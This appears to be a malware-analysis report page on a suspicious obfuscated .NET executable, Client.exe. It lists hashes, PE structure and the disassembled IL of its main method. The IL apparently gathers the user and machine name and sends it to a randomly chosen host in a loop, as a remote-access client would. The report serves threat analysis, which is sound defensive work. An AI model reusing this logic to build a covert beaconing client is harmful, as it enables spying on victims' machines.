Suspicious
Suspect

16b6304ba96f4502a8d7b38e3eff22f5

PE Executable
|
MD5: 16b6304ba96f4502a8d7b38e3eff22f5
|
Size: 525.44 KB
|
application/x-dosexec

Print
Summary by MalvaGPT
Characteristics

Symbol Ofbuscation Score

Very high

Hash
 Hash Value
MD5
16b6304ba96f4502a8d7b38e3eff22f5
Sha1
1c2550c54cf95c7405d067e72477146a91d261e0
Sha256
0a88bfabdd19480ab62124b59c24488483c70a66c7b90ece49c8cb4b16576be7
Sha384
0b7b3d28c54116c7ca37b07acddc5c0e3ff11e36b52b760a68593bbc0181963e8a73d620b71a79939c14362e6ab829d2
Sha512
709239372ba9bf0f0ea2fe0b42e84f1f092f6393c98e7588053906142fb772cefcb92c63fd358a4e4496c4ec0f9231ed29c45d072cba85fc6d94f56020152d5e
SSDeep
12288:MsGcwouYqQ0d28SARBD7vpK8+2P34uXIEYg:fD7md28SK7vo8X8g
TLSH
0CB429257BD48D41D6951A7EC6BE2A01C726A4F222137383370BF7624D41ADEED2C3DA

PeID

Microsoft Visual C++ DLL
Microsoft Visual C++ v6.0
File Structure
16b6304ba96f4502a8d7b38e3eff22f5
[Authenticode]_51d35a4b.p7b
Structure
DosHeader
PE Header
Optional Header (x64)
Section Headers
.text
.rsrc
Resources
RT_VERSION
ID:0001
ID:0
RT_MANIFEST
ID:0001
ID:0
.Net Resources
0el9c03xi
4axuhnjxteq
Informations
Name
 Value
Info

PE Detect: PeReader OK (file layout)
Info

Authenticode present at 0x7E800 size 7296 bytes
Module Name

Client.exe
Full Name

Client.exe
EntryPoint

System.Void vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::yXULoIJQCKzEBQxbkMo(System.String[])
Scope Name

Client.exe
Scope Type

ModuleDef
Kind

Windows
Runtime Version

v4.0.30319
Tables Header Version

512
WinMD Version

<null>
Assembly Name

Client
Assembly Version

1.0.0.0
Assembly Culture

<null>
Has PublicKey

False
PublicKey Token

<null>
Target Framework

.NETFramework,Version=v4.0
Total Strings

642
Main Method

System.Void vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::yXULoIJQCKzEBQxbkMo(System.String[])
Main IL Instruction Count

167
Main IL

call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::sJBdcZYAGwzLZRAhtmPjgHM() stloc V_3 br IL_003F: br IL_000E nop <null> ldloc V_3 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::TqMJCAKQXPlYeoA() ceq <null> brfalse IL_0029: nop nop <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::sGQwJPxsxotJGCMkxjKmMP() stloc V_3 nop <null> ldloc V_3 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::FljnKfcDFmcqarQIDsTLNGAJV() ceq <null> brfalse IL_003F: br IL_000E br IL_0044: call System.Void vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::uuCJYlDaPjnxbHyekyMrYKk() br IL_000E: nop call System.Void vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::uuCJYlDaPjnxbHyekyMrYKk() call System.Void HSTTnkenggtNZumjiDHrBWoDl.JeZsIydlOgbQrhIRVkbXDO::UIpjKCkTHZdTjteJQBEaHd() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::YRHUcSJQxeesXPaKLNVmlODC call System.String jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::kYNVYJvRYmdJWEBvGAXfl() call System.String vzccWWVOLUssumStHgOVfYJN.sTIvMIenNRqMKFBHwCyTH::YmXKWVIVPADxC(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse IL_006C: ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::PNdFwpxLGAPKIILKSTQ call System.Void xhEtakdXoKLuU.BCcsyzrbEoGAhr::lRWUVdPnaCmmyfHorJS() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::PNdFwpxLGAPKIILKSTQ call System.Boolean bdfXmTNggMnIwIPj.ZeSHhWJopOsfiEBIRNePk::dFcRHdjGWoTTMhILcmEqJ(System.String) brfalse IL_0268: leave IL_0273 call System.Void bdfXmTNggMnIwIPj.RdIrbXHYbFT::OMGXatsNGWywuMETePPSs() call System.Void EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::HOyoMBgPxkgPKPUZWGg() ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldfld System.Boolean HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::NStisAnhmARsfuafc brtrue IL_0259: call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::aOWcrFcnTlGsryESNluq() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::XdPSniDsNlnCyjzmltexbKz call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::BbvdOacIKK() newarr System.Char dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::bnMVloXeLmthaGttDk() call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::lZSHeAIbXCORhFhbFGqcSdfJQ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_0 ldloc V_0 ldsfld System.Random EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::DNVvMjNnJKMosbLpHFY ldloc V_0 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::uUXUhZYKZBJf() newarr System.Char dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::VcNzcxVMbteomNIhHuIr() call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::FoEDUptWggSZYVzE() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_1 ldloc V_1 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::DMvvTbsfvLQdRHAnLPo() ldelem.ref <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::wHIcquMMONsI() newarr System.Char dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::dqwwalMLXZdcsOZRmM() call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::KvhwESFZOfQ() stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc V_2 ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC callvirt System.Void HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::PKAxlAzpnekUUfHOQefciWGI() ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldloc V_1 call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::SHBnQEqldcxYhezxfnuc() ldelem.ref <null> ldloc V_2 ldsfld System.Random EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::DNVvMjNnJKMosbLpHFY ldloc V_2 ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::jdMOqMghyrsGhlhrGiFu(System.String,System.String) ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldfld System.Boolean HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::NStisAnhmARsfuafc brfalse IL_0259: call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::aOWcrFcnTlGsryESNluq() ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC newobj System.Void EPjMWBUMwbnaxoymOnnNWbWnQ.HIQcsufffNWIEgdnXwZngdb::.ctor(HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ) stfld EPjMWBUMwbnaxoymOnnNWbWnQ.HIQcsufffNWIEgdnXwZngdb HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::RcqiYgBapYTOMgs ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC newobj System.Void xhEtakdXoKLuU.fmPOsMjHUZHAF::.ctor(HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ) stfld xhEtakdXoKLuU.fmPOsMjHUZHAF HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::WFWCKNssrxezHknji ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::nygwusdVMy() newarr System.Object dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::GsKVrbINvbbiyIOZTIt() call System.String jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::cwWhzJiAogdurZpvWEzbEvrYM() call System.String vzccWWVOLUssumStHgOVfYJN.sTIvMIenNRqMKFBHwCyTH::YmXKWVIVPADxC(System.String) stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::logfIUrWLMPRdQSpTe() call System.Byte[] EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::tukxrNKKxMzmbth() stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::EeghZLQhngS() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::VxlsmMVctqXp stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::NTXuSLfMWjmBi() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::dQgPmzZabovifhCjsraDbgl stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::KEhqZFpBowEHG() call System.String System.Environment::get_UserName() call System.String jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::AAWBDaAmwQzqKmiXxwgcNcFLe() call System.String vzccWWVOLUssumStHgOVfYJN.sTIvMIenNRqMKFBHwCyTH::YmXKWVIVPADxC(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::smEptCCxGWAdoRjV() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::BeFdPmhpqO stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::eyNBMzxHNULebpLFLUjfwIg() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::fNOBUlpIbujU stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::MxLqvQYSTDaJ() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::tHRUYOEXbIcpbvQPcOtmH stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::SfnGifhrTfgoYdxzpvVREpO() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::ZofOsQsdBKfHMIvQxRcXCd stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::GLwwtKXPCMtowYNdzRsSfB() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::icpKWnexGRKT stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::naSeHErocRzAXjkxJ() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::SciZJDfgDoVvHhdF stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::QmLjIDQhsSmw() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::QwijZGHkwyByMBGeckD stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::IFnIVbgPLKYQXxYqtOUjKOOL() ldsfld System.String vjjRehBlOcXXPvHYs.tebTbknuiotqSmPqUuRIMEoN::QZQivijfbZPxeCy stelem.ref <null> dup <null> call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::SONaLZBgUqu() call System.String EPjMWBUMwbnaxoymOnnNWbWnQ.BowmThXgHAKtjMiwYF::BgyKfTWsfCEeO() stelem.ref <null> call System.Byte[] jxexCWXzamZVJBIXH.nPAiDYMTmUfo::eYZiNeDhrpWAvfLfErN(System.Object[]) callvirt System.Void HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ::VKQalwMymrVKsNyRpqRNivdt(System.Byte[]) call System.Int32 jxexCWXzamZVJBIXH.iUOqLjVscuTkHJEsxWbBsGbRK::aOWcrFcnTlGsryESNluq() call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_0085: ldsfld HSTTnkenggtNZumjiDHrBWoDl.hmJnvJpxdkIvszpeHgbUVrCaZ vjjRehBlOcXXPvHYs.WcJWjETKCRNmihmFnjCrLsu::RessyBRXLWC leave IL_0273: ret pop <null> leave IL_0273: ret ret <null>
16b6304ba96f4502a8d7b38e3eff22f5 (525.44 KB)
An error has occurred. This application may no longer respond until reloaded. Reload 🗙